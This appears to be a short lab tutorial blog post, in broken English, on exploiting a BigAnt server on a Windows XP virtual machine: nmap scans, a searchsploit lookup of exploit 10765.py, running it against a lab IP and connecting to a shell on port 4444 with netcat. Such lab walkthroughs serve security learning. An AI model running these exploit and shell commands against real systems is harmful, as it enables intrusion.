This exploit uses laboratory experiment virtualbox windows xp with tolls exploitdb and to search the information first :
1. Information Gathering
1. Information Gathering
- Secen IP in the consol by typing the code like this --> #nmap 192.168.56.0/24
2. Service Enumeration
- Once we know the ip which is in the target, we can find open port by typing as follows --> #nmap -p 1-65535 192.168.56.101
3. Vulnerability
- After the we find vulnerability BigAnt windows by typing the following --> # ./ searchsploit bigant windows remote
- Then to see the files from 10765.py we can typewriting --> # cat platforms/windows/remote/10765.py
- The we are typing # cd /pentest/exploits/exploitdb/platforms/windows/remote
4. Exploits
- Then to exploits us can be typed --> # python 10765.py 192.168.56.101
- Then we are typing --> # cat 10765.py
- Then we are typing --> # nc -vn 192.168.56.101 4444
0 komentar:
Posting Komentar